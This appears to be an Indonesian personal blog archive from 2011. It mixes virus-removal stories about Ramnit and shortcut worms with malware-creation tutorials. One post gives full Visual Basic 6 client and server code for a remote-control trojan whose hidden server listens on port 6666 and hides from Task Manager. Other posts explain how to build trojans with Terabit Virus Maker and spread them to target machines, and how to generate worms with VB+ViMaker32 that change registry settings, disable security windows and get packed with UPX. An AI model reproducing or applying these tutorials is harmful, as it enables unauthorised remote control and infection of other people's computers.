>

welcome to my website

nothing other than success begins with failure

impian

Jangan menyerah atas impianmu. Impian memberimu tujuan hidup. Ingatlah, sukses bukan kunci kebahagiaan. Semangat!

pendewasaan

Kesalahan hanya membuatmu dewasa. Senyuman mampu meringankan luka. Sahabat akan selalu ada di saat kamu membutuhkannya.

kesempurnaan

Terkadang, kesulitan harus kamu rasakan terlebih dulu sebelum kebahagiaan yang sempurna datang kepadamu.

kesuksessan

Jangan biarkan orang lain menghalangimu tuk mengejar impianmu. Tetap berjuang, dan percayalah, semua akan indah pada waktunya.

Tampilkan postingan dengan label Virus 2011. Tampilkan semua postingan
Tampilkan postingan dengan label Virus 2011. Tampilkan semua postingan

Kamis, 24 November 2011

Cara Hapus Tuntas virus Copy of Shortcut + Recycler (W32/Ramnit)

Lagi asyik nonton pertandingan sepakbola antara Jeonbuk Hyundai Korea VS Arema Malang Indonesia, tiba-tiba datang 2 orang pemuda berbadan kekar dan tampang sangar, membawa sebuah kotak hitam besar. Wah, kupikir itu pengirim paket yang mencurigakan yang bisa saja isinya adalah bomb, seperti yang marak belakangan ini.

Tanpa basa-basi saya tanya apa keperluan mereka. Dan jawabannya adalah : "Tolong Cek CPU Kami, terjangkit virus aneh yang bikin pusing." itu kata mereka.

Setelah mereka pulang, akupun mengecek CPU berspec AMD Sempron, Hardisk 120 Gb Sata, Memory 2GB DDR2, VGA Onboard NVidia 6150 + Mb. Biostar (entah jenis apa, saya lupa).

Setelah ku hidupkan, ternyata memang ada ke anehan yang membingungkan saya sendiri. Di scan dengan antivirus Kaspersky yang sudah ada di komputer tersebut, tidak terdeteksi virus apapun (nb : signature virusnya sudah kadaluwarsa lebih dari 4 bulan :D ), namun saat saya colokkan flashdisk untuk mencoba menginstallkan antivirus SMADAV, tiba-tiba muncul 4 buah file dan 1 buah folder tak di undang di root flashdisk yaitu :
Copy of Shortcut to (1).lnk
Copy of Shortcut to (2).lnk
Copy of Shortcut to (3).lnk
Copy of Shortcut to (4).lnk
Folder Recycler yang di dalamnya berisi banyak file-file yang tak diketahui apa fungsinya.

Hem..saya yakin flashdisk saya bersih dari Virus apapun, logikanya adalah : flashdisk saya sudah di susupi virus dari komputer yang dibawa kedua orang tersebut.

segera saya buka notebook saya, browsing ke internet, cari informasi yang bisa menjelaskan Fenomena Aneh Flashdisk ini.

Dan Akhirnya saya menemukan jawabannya : Virus W32/RAMNIT dan variantnya.

Virus Ramnit atau biasa dinamai ShortCut Recycler dan Win32.Siggen.8 adalah sejenis trojan/backdoor, dan keganasannya bikin jengkel banyak praktisi Komputer, bahkan disebut-sebut mendekati kemampuan Sality yang saya sendiri mengakui memang bikin jengkel. Virus ini menginject file Exe, DLL, SCR, Html dan file-file executable lainnya di Windows Environtment.

Salah satu ciri khas virus ini adalah keluarnya file  Copy of Shortcut to (1 s/d 4).lnk di flashdisk yang dicolokkan ke komputer yang sudah terjangkit virus ini. Selain itu, terdapat sebuah file bernama watermark.exe di C:\Programs Files\Microsoft\ dan  C:\Program Files\Common Files\Microsoft\

melihat kemiripan dengan Sality tersebut, penulis mencoba menggunakan Smadav terbaru untuk mendeteksi keberadaan virus tersebut di komputer terdakwa, dan, lagi-lagi Smadav mandul belum bisa mendeteksi virus yang satu ini, padahal menurut informasi, virus ini telah hadir sejak tahun 2010 (Variant A).

Cara Menghapus Tuntas Virus Shortcut Recycler - W32/Ramnit dan Variantnya (A-H) :
 Setelah 30 menit merenung apa yang mesti dilakukan, sampai Arema kebobolan 6 Gol, saya masih tercenung menatap gunung, eh, menatap layar monitor LCD Samsung saya, karena menurut hasil searching, ternyata solusinya adalah : Mengistall ulang total Windows + Aplikasinya, termasuk menghapus semua partisi hardisk..... Busyet, masa kita kalah sama virus?

Akhirnya saya menemukan cara untuk memberantas tuntas Virus Shortcut Recycler W32-Ramnit ini tanpa harus menginstall ulang total Windows beserta aplikasi-aplikasinya.
Caranya cukup simple, dengan sebuah tool berukuran cuma sekitar 19 Mb bernama : Ezet NOD32 On Demand Scanner, alias NOD32 Portable, sebuah yang bisa di download di :




Virus Copy Of Shortcut Recycler Removal tool - W32/Ramnit Removal Tool 
(pilih versi yang paling baru dari W32/Ramnit Removal Tools ini)



Dowload Virus Shortcut Recycler Ramnit Remover Tool tersebut dari komputer yang bersih dari virus, commpress dengan winrar dan copy kan ke flashdisk yang juga bersih dari virus tersebut. Setelah itu, colokkanlah flashdisk tersebut ke komputer  yang dicurigai terjangikit Virus Shortcut Recycler Ramnit. Jalankan file Virus Shortcut Recycler Ramnit Remover Tool tersebut dari dalam winrar (jangan di ekstrak).


Perlu diingat bahwa, selama proses Scanning berlangsung, jangan pernah melakukan aktivitas apapun, termasuk hanya sekedar untuk klik kanan desktop PC anda, karena klik kanan sama dengan mengaktifkan kembali virus tersebut.

Alternatif lain adalah dengan menggunakan :

PCMAV Express For Ramnit

PCMAV Express for Ramnit
PCMAV Express For Ramnit juga sangat efektif memberantas tuntas virus sialan yang satu ini. cukup dengan beberapa klik, hampir dapat dipastikan semua virus Ramnit akan terhapus tuntas sampai ke akar-akarnya.
Download PCMAV Express For Ramnit : [HERE]

Untuk pembersihan Virus Ramnit ini menggunakan PC MAV, perlu di perhatikan bahwa PC/notebook anda harus terputus dari koneksi ke Jaringan ataupun internet. Scan dan bersihkan Virus Copy of Shortcut + Recycler (W32/Ramnit) saat dalam kondisi Safe mode untuk hasil yang optimal.

Hasilnya cukup memuaskan, hampir semua file exe, dll dan file executable lainnya di CPU terdakwa telah terinjeksi oleh virus yang mengesalkan ini, dan dengan 1 klik, semua virus tersebut bisa di bersihkan (Clean) dengan baik, termasuk induknya serta anak-buahnya, sampai ke akar-akarnya. Kini, tak pernah lagi muncul file aneh Copy of Shortcut to (1 s/d 4).lnk serta folder recycler tidak lazim di flashdisk yang saya colokan ke komputer tersebut.

Tool inipun ternyata cukup ampuh mendeteksi berbagai macam trojan, backdoor dan virus lainnya.

Tak berapa lama, sang pemilik CPU datang, dan memboyong CPU nya kembali dengan wajah sumringah sembari menyisipkan beberapa lembar uang Rp.50.000, an ke saku baju saya.

Sabtu, 19 November 2011

CARA MEMBUAT VIRUS



Disini kita akan membahas gimana cara membuat virus, sebenarnya gampang-gampang susah, untuk orang-orang awam sih sulit tuk membuat virus, tapi disini ada software utuk membuat virus. Jangan panjang lebar untuk itu. Kita perkenalkan Terabit Virus Maker. 3.2 SE software ini bisa membuat virus berjenis trojan, banyak kegunananya misalnya :
1.Cara mematikan monitor
2.tidak ada suara dalam volume
3.me-close sendiri IE dalam 10 menit
4.dsbdan cara penggunaanya sangat gampang :
1.Buka dulu Terabit Virus Maker 3.2 SE
2.Pilihlah cara virus bekerja,
3.klik kotak putih Fake error Message dan ketiklah pesan yang pada virus agar yang tertuju membaca pesan anda tersebut.
4.Ketik berapa byte yang anda kehendaki, semakin besar byte yang anda ketik semakin besar pula virus yang anda buat
5.nama virus sebelum di instal
6.pilihlah gambar yang anda kehendaki dan Nama virus
7.lalu klik Create Virus, dan kemudian save setting, exit,

Jadi dech virus yang anda buat dan suruh instal virus yang anda buat tadi agar virus tersebut menyebar pada komputer yang anda tuju, terima kasih semoga bermanfaat.

:dibawah
DOWNLOAD

membuat virus Trojan Horse Dengan Visual Basic 6.0



Virus trojan merupakan virus yang merepotkan dan berbahaya karena itu para hacker biasanya mengunakanya untuk keperluan hacking komputer , tapi pada kesempatan kali ini saya akan mengupasnya sedikit, Tapi jangan di salah gunakan lo ini hanya sekeda untuk pembelajaran aja kq.
Pada pembuatan Trojan Horse ini (TH) ada beberapa step yang perlu kita perhatikan antara lain:
  1. Tahap Persiapan
  2. Tahap Pengerjaan
a). Client
è Interface
è Coding : Conection, Half-Execution, Error Handler, dll..+ debug
b). Server
è Coding : Open Gate, Execution, Stealth, dll.
3.  Tahap Akhir
Sekarang marilah kita mulai untuk membuat proyek kita ini. Disarankan sebelum kita memulai untuk melaksanakan suatu pekerjaan ada baiknya kita berdoa terlebih dahulu agar apapun yang kita kerjakan mendapat berkah dari Tuhan YME. Amin…..!!!!!!
1. TAHAP PERSIAPAN
Pada tahap ini yang pertama harus kita lakukan adalah membuka aplikasi Visual Basic. Setelah itu pada jendela New Project pilih Standard EXE seperti pada gambar.

Setelah itu akan tampil satu form kosong, dan tampilan default lainya.
Untuk membuat proyek ini kita tidak bisa  menggunakan tools (control) sederhana yang ditampilkan pada Toolbox. Kita memerlukan satu control tambahan yang harus kita load ke dalam Toolbar/Toolbox. Control yang kita maksud disini adalah MS WINSOCK control.
Untuk mengaktikan (memanggil) control ini kita pilih Project > Components pada Menubar. Maka akan tampil jendela component seperti pada gambar:

Lalu kita pilih Microsoft Winsock Control 6.0 dengan memberi tanda centang pada checkbox disisi kirinya (spt pada gbr). Maka pada toolbar akan tampil satu control tambahan ber-icon dua computer yang terhubung oleh garis merah seperti pada gambar berikut.

Gambar ini menandakan bahwa ms winsock control berhasil kita load ke dalam toolbar dan siap di gunakan.
Dengan tampilnya icon contol tersebut berarti persiapan kita untuk membuat proyek ini telah selesai. Maka kita akan lanjutkan ketahap berikutnya. Yaitu tahap pengerjaan.
2. TAHAP PENGERJAAN
Seperti yang sudah kita ketahui sebelumnya, umumnya program TH terdiri dari dua unit program yaitu : CLIENT dan SERVER. Saya akan coba jelaskan sedikit maksud dari kedua program ini.
Program CLIENT ialah program yang akan kita gunakan sebagai sarana pengendali (remote) dari program SERVER. Dengan kata lain program ini lah yang akan kita gunakan untuk mengeksekusi computer korban (victim) dengan bantuan SERVER yang ditanamkan pada victim.
Sedangkan program SERVER ialah program yang akan kita tanamkan pada victim dengan tujuan mengeksekusi victim itu sendiri berdasarkan instruksi yang dikirimkan oleh program CLIENT. Bingung??!!!…Sukuriiinnn…!!!!
Okey..marilah kita mulai tahap ini dengan membuat program CLIENT terlebih dahulu. Kenapa?? Karena untuk membuat program ini tidaklah terlalu sulit. OK..marilah…ehm…
Program CLIENT
Pada program ini kita akan membuat dua “Fun Menu” yaitu : Open/Close CD ROM dan Send Message.
Sekilas Info:
Sebenarnya masih banyak “Fun Menu” lain yang dapat kita tambahkan, tapi pada pembahasan kali ini  kita persingkat saja karena akan memakan banyak halaman untuk menjelaskannya. Oleh karena itu pembahasan “Fun Menu” lebih lanjut  akan saya buat pada artikel selanjutnya (“Membuat TH dengan VB6 seri 2). Untuk release artikel ke-2, tergantung dari banyaknya respon yang mendukung yang saya terima melalui e-mail di xpartacvs@gmail.com
Interface
Dalam hal ini yang kita perlukan ialah 5 command button, 2 textbox, 1 label, dan 1 winsock control. Atur sedemikian rupa sesuai selera anda pada form.

rename tiap nama control menjadi seperti dibawah ini :
Command1     – cmdConnect                      Label1       - lblStatus
Command2     – cmdDisconnect                  Text1        – txtIP
Command3     – cmdOpen                           Text2        – txtMsg
Command4     – cmdClose                           Winsock1 – tcpClient
Command5     – cmdMsg

Jangan lupa Caption dan Text pada control.
Coding
Ok saatnya coding…..
Klik ganda pada tombol Connect, lalu masukan code berikut pada jendela code:
Private Sub cmdConnect_Click()
On Error Resume Next
cmdConnect.Enabled = False
lblStatus.Caption = “Connecting..”
If txtIP.Text = “” or Then
MsgBox “Please enter a valid IP adress”, vbCritical
End If
tcpClient.Connect txtIP.Text, 6666
End Sub
Maksud dari script diatas ialah:
computer akan mematikan tombol connect. Lalu computer akan memberikan keterangan “connecting….” pada label status untuk memberikan keterangan pada anda bahwa saat ini anda sedang berusaha untuk melakukan koneksi ke computer Korban. Setelah itu computer akan mengecek apakan anda sudah mengisi IP Address atau belum. Jika belum  maka akan tampil msgbox jika sudah maka computer akan mencoba koneksi ke nomor IP yang anda masukan pada txtIP dengan nomor port 6666 (nomor port bisa diisi berapa saja, umumnya terdiri dari empat digit).

Peringatan :
Perhatikan dan ingat nomor port yang anda masukan, karena akan kita gunakan untuk program SERVER.
Klik ganda pada tombol disconnect dan masukan code berikut:
Private Sub cmdDisconnect_Click()
On Error Resume Next
LblStatus.Caption = “Not Connected”
cmdDisconnect.Enabled = False
cmdConnect.Enabled = True
tcpClient.Close
End Sub




Maksud dari script diatas ialah:
Computer akan memberi keterangan “Not Connected” pada label status untuk menginformasikan bahwa tidak ada koneksi yang sedang berjalan saat ini. Lalu Komputer akan mematikan tombol Disconnect dan menghidupkan kembali tombol Connect. Lalu computer akan memutuskan hubungan dengan Server.
Klik ganda pada Winsock dan pilih pada menu event  “Connect”. (spt pada gbr):

Lalu tambahkan kode berikut:
Private Sub tcpClient_Connect()
lblStatus.Caption = “Connected”
End Sub
Keterangan “Connected pada label status hanya akan tampil setelah SERVER merespon.
Half-Execution
Mungkin anda bertanya kenapa saya menyebutnya Half-Execution. Alasanya ialah karena pada program CLIENT ini Eksekusi yang kita inginkan belumlah dapat di jalankan tanpa bantuan SERVER. Prinsip kerja program CLIENT dalam melaksanakan eksekusi ialah hanya sebagai “Commander” atau pemberi instruksi.
Maksudnya disini  program CLIENT akan mengirimkan data berupa ‘string’ kepada program SERVER yang nantinya akan diolah (diterjemahakan) oleh program SERVER sebagai suatu perintah untuk melaksanakan eksekusi. Ok..mari kita mulai….
Klik ganda pada tombol Open cd-rom lalu tambahkan kode berikut:
Private Sub cmdOpen_Click()
tcpClient.SendData “opn”   ‘Mengirimkan string ke server
End Sub
Klik ganda pada tombol Close cd-rom lalu tamahkan kode berikut:
Private Sub cmdClose_Click()
tcpClient.SendData “cls”  ‘Mengirimkan string ke server
End Sub
Klik ganda pada tombol Send message dan tambahkan kode berikut:
Private Sub cmdMsg_Click()
tcpClient.SendData “msg” & txtMsg   ‘Mengirim string ke server beserta isi txtbox
End Sub
Selamat Program CLIENT sudah selesai…….!!!!
Debug Client
Program CLIENT yang baru kita buat diatas belumlah sempurna. Saya yakin masih banyak terdapat bug pada program tersebut. Oleh karena itu marilah kita mencoba untuk menyempurnakanya.
  1. Tombol Disconnect
Pada object ini yang pertama yang harus kita perhatikan ialah Property dari tombol ini. Saat Program dijalankan pertama kali sebaiknya tombol ini berada pada keadaan ‘disabled’ (mati). Karena seperti yang sudah kita ketahui sebelumnya fungsi dari tombol ini adalah memutuskan Koneksi ke Server.
Pada saat kita menjalankan program ini tentu saja belum ada koneksi sama sekali terhadap SERVER, oleh karena itu ada baiknya kita mematikan tombol ini dengan merubah property cmdDisconnect.Enabled manjadi false pada jendela property.
  1. On Error Resume Next
Ada baiknya sebelum mengetikan code pada badan sub, kita awali dengan mengetikan On Error Resume Next agar ketika terjadi kesalahan program kita tidak mengeluarkan pesan error dan tidak keluar dari program.
Program SERVER
Setelah program CLIENT selesai kita buat sekarang saatnya kita membuat program Executor yang sebenarnya yaitu program SERVER. Apakah program CLIENT anda masih terbuka? Sebaiknya iya agar kita lebih mudah dalam mengerjakan pogram SERVER.
Pertama jalankan kembali aplikasi visual basic seperti biasa dan pilih Standard EXE maka akan tampil tampilan default beserta tetek bengeknya…. Pada program SERVER ini kita hanya membutuhkan satu control yaitu MS WINSOCK CONTROL. Letakan satu winsock kedalam form dan beri nama tcpServer Bila belum tersedia pada toolbar, load kembali seperti pada pembahasan sebelumnya.. Dan jangan lupa mengganti nama form menjadi frmServer, jangan lupa juga untuk menguah property Visible-nya menjadi false.

Open Gate
Kita akan mulai dari terhnik termudah dulu yaitu Open Gate. Mari kita Mulai……
Klik ganda pada form lalu masukan kode berikut:
Private Sub Form_Load()
On Error Resume Next
tcpServer.LocalPort = 6666
tcpServer.Listen
End Sub
Maksud dari script diatas:
Pertama winsock (tcpServer) akan mengecek pada port yang kita masukan yaitu 6666 (nomor port yang sama dengan program CLIENT). Setelah itu winsock akan membuka port tersebut dengan perintah Listen. Tujuannya ialah : agar program CLIENT yang mencoba untuk Connect ke computer korban dapat masuk melaliu port yang telah kita buka yaitu port 6666.
Sekarang kita akan memberi kode pada winsock jadi Klikganda pada winsock control dan pilih “connection request” pada combobox  event ( kalau kurang jelas lihat pembahasan pada program CLIENT)
Tambahkan kode berikut:
Private Sub tcpServer_ConnectionRequest(ByVal requestID As Long)
On Error Resume Next
tcpServer.Close
tcpServer.Accept requestID
End Sub
Maksud dari script diatas:
Pertama winsock akan menutup koneksi untuk menghindari terjadinya error, lalu ia akan menerima semua request yang masuk ( request dari program CLIENT).
Masih pada winsock,     pilih “error” pada combobox event dan beri kode berikut:
Private Sub tcpServer_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
On Error Resume Next
Do While tcpServer.State <> sckClosed
tcpServer.Close
loop
tcpServer.Listen
End Sub
Maksud dari script diatas:
Saat terjadi error pada koneksi, winsock akan segera menutup koneksi setelah itu ia akan membuka kembali port agar bisa dihubungi kembali oleh server.
Waw…untuk membuka pertahanan victim cukup panjang bukan? Sekarang marilah kita melangkah ke tahap berikutnya yaitu melakukan infeksi kedalam computer korban.

Execution
Sekarang saatnya kita buat program pengeksekusi yang sebenarnya. Sebelum kita masuk kebagian utama, pertama-tama tambahkan sebuah module kosong. Pilih Projectdiatas layar” dan pilih add module. Lalu buka modul kosong tsb.
Untuk membuka atau menutup CD-ROM kita perlu menggunakan fungsi API pada windows. Oleh karma itu kita perlu API viewer.
Klik pada add-ins lalu klik API Viewer. Jika anda tidak melihatnya pada daftar maka klik Add-In Manager lalu pilih kemudian tekan “OK”. Saat kamu membuka API Viewer, kamu akan melihat jendela baru. Klik File lalu pilih load textfile dan pilih WIN32API.txt truss buka dech.


Load WIN32API.txt file


Pada mciSendString seperti yang ditunjukan oleh gambar, set Declaration Scope menjadi Public lalu tambahkan pada module. Tekan Insert untuk menambahkanya secara otomatis
Sekarang kita siap untuk memberi kode pada Open / Close cd-rom. Kembali ke form dan Klik ganda pada winsock dan pilih “DataArrival” pada procedure window lalu tambahkan kode beriktu:
Private Sub tcpServer_DataArrival(ByVal bytesTotal As Long)
Dim varData As String
Dim strData As String
tcpServer.GetData strData, vbString
varData = Right(strData, Len(strData) – 3)
Select Case Cstr(strdata)
Case “opn”
mciSendString “Set CDAudio Door Open”, vbNullString, 0, 0
Case “cls”
mciSendString “Set CDAudio Door Closed”, vbNullString, 0, 0
Case “msg”
MsgBox varData, vbInformation, “Information”
End Select
End Sub
Maksud dari script diatas:
Saat data diterima, pertama program akan mendeklarasikan vardata dan strdata sebagai string dengan strdata sebagai penampung data yang masuk. Sedangkan vardata ialah data bawaan yang tidak diproses sebagai perintah ( pesan pada msgbox ). Setelah itu program akan mengambil data yang masuk dengan mengkonversinya terlebih dahulu menjadi string, jika tidak data yang masuk akan bertipe byte. Lalu program akan menyeleksi data yang masuk apakah data bernilai opn, cls, atau msg. jika data bernilai opn maka akan dilakukan perintah pembukaan CD-ROOM, jika data adalah cls maka akan dilakukan perintah penutupn CD-ROOM, dan jika data bernilai msg maka akan ditampilkan msgbox berisi pesan yang ditampung pada variael vardata.

Stealth
Untuk lebih memperpanjang umur program Trojan kita, ada baiknya kita buat program kita seolah tidak terlihat. Caranya ialah menghilangkan program dari task manager. Untuk melakukanya : Tambahkan script berikut pada sub Form_Load sehingga menjadi :
Private Sub Form_Load()
On Error Resume Next
tcpServer.LocalPort = 6666
tcpServer.Listen
App.TaskVisible = False
End Sub
3. TAHAP AKHIR
Pada tahap akhir ini saya tidak akan menjelaskan apa-apa, pada tahap ini anda tinggal mengkompile program2 yang telah dibuat tersebut dan mungkin mengadakan sedikit pengetesan dan debugging.
PENUTUP
Sebelumnya saya ucapkan terimakasih pada semua yang telah mendukung dalam penyusunan artikel ini. Selain itu saya juga mohon maaf apa bila ada kekurangan dan ketidak sempurnaan pada bahasan ini. Karena sebagai manusia saya tidak akan luput dari kesalahan. Saya juga mohon maaf yang sebesar-besarnya apabila rekan-rekan sekalian ada yang tidak menyukai artikel yang saya tulis. Artikel ini semata-mata saya buat tidak lain ialah hanya untuk Pembelajaran aja. Karena saya sadar “Diatas langit masih ada langit” jadi saya sangat mengharapkan saran dan kritik dari rekan-rekan sekalian demi kemajuan ilmu pengetahuan. Wassalam…
TAMBAHAN :
Trojan ini masih jinak.. artinya belum melakukan infeksi sehingga masih aman untuk tahap percobaan. Untuk pembahasan lengkap (pure Trojan) akan saya bahas pada artikel ke selanjutnya.

Senin, 07 November 2011

Cara Instant membuat Virus Komputer denganVB+ViMaker32

Oke, tanpa banyak cang…cing…cong….nyak..babeh…, mari kita mulai dengan ‘Black Project’ yang akan kita ciptakan, siap….????? Oke kita mulai…..
Oooopppss…. Tapi sebelumnya ada yang tau VB+Vimaker32 ga??? Oke, mungkin biar ga bingung and ga tersesat nantinya , saya akan jelaskan sedikit. VB+ViMaker32 adalah sebuah worm generator yang diciptakan khusus untuk menciptakan worm secara mudah,cepat dan instan atau istilah gaulnya GPLLY (ga pake lama la yaw…. J )

Oke, tanpa banyak cang…cing…cong….nyak..babeh…, mari kita mulai dengan ‘Black Project’ yang akan kita ciptakan, siap….????? Oke kita mulai…..
Oooopppss…. Tapi sebelumnya ada yang tau VB+Vimaker32 ga??? Oke, mungkin biar ga bingung and ga tersesat nantinya , saya akan jelaskan sedikit. VB+ViMaker32 adalah sebuah worm generator yang diciptakan khusus untuk menciptakan worm secara mudah,cepat dan instan atau istilah gaulnya GPLLY (ga pake lama la yaw…. J )

Sesuai dengan namanya program ini dapat menciptakan worm dalam bahasa Visual Basic yang akan mempunyai aksi-aksi tertentu sesuai dengan pengaturan yang diberikan. (Bener-bener sesuai dengan pengaturan yang kita kasih lho….), so buat para newbie yang pengen jadi #VM (Virus Maker bo…!) bisa pake ni program buat belajar. Tapi Cuma buat belajar lho, bukan buat mainan atawa yang laen apalagi buat ngerusak komputer orang laen, sesuai dengan tujuan dibuatnya tool ini, Cuma buat pendidikan dan ilmu pengetahuan, (Itu kata pembuatnya….).Oh ya Program ini bisa didownload gratis di: http://www.spyrozone.net di menu Vir&Worm + Removal. Atau e-mail aj ke sang empunya di: elitclass.saputra478@gmail.com.

Oke dech langsung aj kali ye… bis cape ngomong terus dari tadi ga mulai-mulai neh…J Tapi sebelum kita memulai membuat ‘Black Project’ dengan tool ini kita membutuhkan beberapa persyaratan dan tools, yang semuanya bisa didownload di dapur kalian masing-masing:
Sebuah gelas yang berisi air panas lengkap dengan sendoknya.
Satu sachet cappuccino rasa apa saja yang belum kadaluwarsa, klo ini bisa didownload di warung terdekat… J)
Cemilan, kalo bisa yang enak dan ga mengandung lemak.
Hati, Pikiran dan niat yang tulus dan ikhlas untuk menanggung segala macam akibat dan resiko yang terjadi apabila kesalahan atau ketidaksengajaan yang menyebabkan worm yang dibuat menjadi raja dikomputer sendiri (sejenis senjata makan tuan gtu…. J)

Sekarang benar-benar mulai deh, setelah didownload, pertama install dulu program VB+Vimaker32-nya tapi sebelumnya backup dulu data2 penting untuk mencegah sesuatu yang tidak diinginkan, truz jalanin file .exe nya, lalu pilih File->Project Baru (Full Load) atau tekan Ctrl+M di keyboard. Hasilnya seperti gambar dibawah ini.

Tampilan VB+Vimaker32 RC 03 :


Masukan semua keterangan tentang virus yang akan dibuat beserta pengaturan-pengaturan lainnya, seperti pengaturan Informasi Virus, Registry, Message dan dll. Masukan semuanya sesuai dengan keinginan, untuk lebih lengkapnya buka aja dokumentasinya yang disertakan. Semua informasi pengaturan settings dll ada disitu. Yang menarik dari program ini adalah karna banyak pengaturan dan kustomasi yang bisa diatur sendiri sesuai dengan kebutuhan, tidak seperti program worm generator lainnya yang cuma tinggal masukin nama pembuat dan pesan yang akan ditampilkan, terasa kurang bebas dan leluasa gtu… J,

Untuk pengaturan tentang registry yang akan diubah bisa diambil di menu Tools-> Registry Action Selector, terdapat 50 Registry Entry yang bisa dipilih, tinggal pilih truz double klik di setingan registry-nya. Truz klik Insert, Cut dan paste di section [REGISTRY]. Selain itu worm yang dibuat dengan tools ini juga bisa membaca caption window yang aktif sehingga jika caption tersebut ada dalam daftar terlarang maka akan otomatis dilumpuhkan. Untuk memilih daftar window caption yang akan dilumpuhkan gunakan Window Caption Selector di menu Tools. Disitu ada 176 daftar caption yang bisa dipilih. Tuh kan ga beda jauh dengan worm lokal sejenisnya. Pokokenya top bgt nih program! He..he… J

Berikut tampilan Registry Action Selector :


Window Caption Selector



Jangan lupa icon virusnya juga bisa diubah, untuk mengganti icon default tinggal ubah di subsection : EXEIcon = \Icons Source\Folder\Folder001.ico
Terdapat banyak pilihan icon yang disediakan didalam folder Icons Source, so tinggal pilih aja…
Terakhir dan merupakan saat yang ditunggu-tunggu adalah melakukan pemeriksaan kode yang telah diketik sebelum dicompile menjadi virus. Klik menu Project->Analisa Project atau tekan F8 untuk menganalisa kode, setelah analisa selesai dan tidak ada kesalahan penulisan kode yang dideteksi maka ‘Black Project’ yang kita buat bisa langsung dicompile. Tekan F9 untuk mengcompile project dan sebuah pesan peringatan akan muncul dan menanyakan apakah proses compile akan dilajutkan, baca dulu semua konsekuensinya truz klo setuju klik yes, maka virus yang kita buat akan langsung dicompile menjadi file executable (.exe)

File virus hasil compile :



File hasil compile memang cukup besar karena tidak otomatis dikompres secara internal, tapi kita masih bisa mengompres dengan program kompresor lain seperti UPX atau tElock. Akhir kata selamat ber-Virus Maker J Semoga artikel ini bermanfaat dan sungguh tak ada niat dari penulis sedikitpun untuk memotivasi agar membuat virus dengan tool ini, tujuan penulis tidak lain hanya berbagi informasi dan pengetahuan dan penulis tidak bertanggung jawab atas segala resiko apapun yang terjadi akibat dari penyalahgunaan artikel ini.

Jumat, 04 November 2011

Tutorial Menghapus Virus Shortcut Random VB/6

Tutorial Menghapus Virus Shortcut Random VB/6
Tanggal publikasi: 2011-11-05 Penulis: amor. Dibaca: 11039 kali

Hallo sobatamor, kali ini kita membahas cara menghapus virus Shortcut Random VB/6 dengan menggunakan Safe X-Plore-Ihsana Malicious Removal.
Perhatikan file-file penularan dan hasil excute berikut
File-file penularan pada USB Drive/flashdisk :
  • x.exexe
  • zzz.dll
  • autorun.inf
  • noipee.exe/qoizeew.exe/duapoy.exe/klxir.exe/dueik.exe/paujif.exe/xhvoun.exe/kwqid.exe/laqot.exe/neasux.exe/nueex.exe/zmxuov.exe/dst (memiliki nama file random)
  • noipeex.exe/qoizeewx.exe/duapoyx.exe/klxirx.exe/dueikx.exe/paujifx.exe/xhvounx.exe/kwqidx.exe/laqotx.exe/neasuxx.exe/nueexx.exe/zmxuovx.exe/dst (memiliki nama file random)
  • *.lnk (beberapa file yang berextensi lnk/shortcut)
 Hasil Execution :
  • %User%\alg.exe
  • %User%\*.exe
  • %User%\*.lnk
Untuk menghapus virus ini berikut ini beberapa kelemahan/kelebihan suatu sistem yang bisa dimamfaatkan:
  1. File *.exe dan autorun.inf tidak pernah berada pada folder User Accounts, klw ada bisa dipastikan itu adalah virus.
  2. Suatu file/virus yang tidak bisa dihapus (sedang proses) belum tentu tidak bisa direname ke nama lain (bisa digunakan sebagai alternatif delete).
  3. Suatu program/virus belum tentu bisa mengenali apakah itu file atau folder (folder bisa digunakan sebagai alternatif file).

Perhatikan Langkah-langkah menghapus virus Shortcut Random VB/6 dengan menggunakan Safe X-Plore, Jika belum punya silahkan download Safe X-Plore - Ihsana Malicious Removal.
  1. Klik kanan Safe X-Plore dan pilih Run as administration
  2. Klik filter file dan pilih *.exe
  3. Klik tombol pintas menu User account.
  4. Kemudian klik folder user yang sobat pakai
  5. Klik virus tersebut
  6. Klik Remove by force & Protect Growth
  7. Restart komputer sobat segera
  8. Lakukan penghapusan irus pada flashdisk dan yang lain berdasarkan langkah diatas.
  9. Jangan pernah menjalankan Windows Explorer sebelum virus dipastikan sudah tidak berfungsi.
Perhatikan gambar Safe X-Plore, ihsana memakai User Accounts : Jasman

cara menghapus  Virus Shortcut random noipee.exe; qoizeew.exe; duapoy.exe; klxir.exe; dueik.exe; paujif.exe; xhvoun.exe; kwqid.exe; laqot.exe; neasux.exe; nueex.exe; zmxuov.exe; noipeex.exe; qoizeewx.exe; duapoyx.exe; klxirx.exe; dueikx.exe; paujifx.exe; xhvounx.exe; kwqidx.exe; laqotx.exe; neasuxx.exe; nueexx.exe; zmxuovx.exe;
Jika permasahan belum teratasi silahkan kunjungi situs ini lagi.

Pengalaman membasmi virus shortcut, W32 Ramnit

Beberapa hari yang lalu komputer tetangga saya bermasalah, karena setelah dimasukkan USB Flashdisk, selalu muncul empat buat shortcut, yaitu Copy of Shortcut to (1).lnk sampai Copy of Shortcut to (4).lnk. Tidak hanya sampai disitu, beberapa program atau aplikasi yang biasa digunakan tiba-tiba tidak bisa dijalankan, sehingga dugaan saya komputernya terkena virus.Sebenarnya komputer tersebut sudah di install Antivirus, ketika itu menggunakan Avira Antivir Personal. Tetapi karena penggunanya masih anak kecil, sehingga kurang perhatian (belum tahu) akan pentingnya update antivirus, termasuk ketika menjalankan program dari flashdisk.

Segera saya menyiapkan update manual Avira Antivir yang ternyata saat ini ukurannya cukup besar, sekitar 43 MB. Alhamdulillah update manual Avira berhasil dan Avira juga masih bisa berjalan normal. Setelah itu langsung saja saya lakukan Full Scan Hardisk. Setelah selesai, ternyata memang ditemukan banyak file yang terinfeksi virus, W32/Ramnit.C ( virus Ramnit varian C yang menginfeksi file windows 32 bit).

File-file yang terinfeksi virus adalah exe, dll dan juga HTML yang merupakan file-file penting, terutama exe dan dll, karena biasanya merupakan file program atau aplikasi yang biasa kita gunakan. Untuk berjaga-jaga maka semua file yang terinfeksi saya masukkan ke karantina, siapa tahu di internet ada tools untuk memperbaiki file yang terinfeksi virus tersebut.
Setelah googling mencari informasi tentang virus Ramnit.C ini, ternyata belum menemukan tools atau program yang dapat digunakan untuk memperbaiki file yang terinfeksi virus. Sehingga terpaksa mencari solusi lain sampai kemungkinan install ulang windows, karena program atau aplikasi menjadi rusak dan tidak bisa dijalankan.

Install Ulang Windows, Repair atau … ?

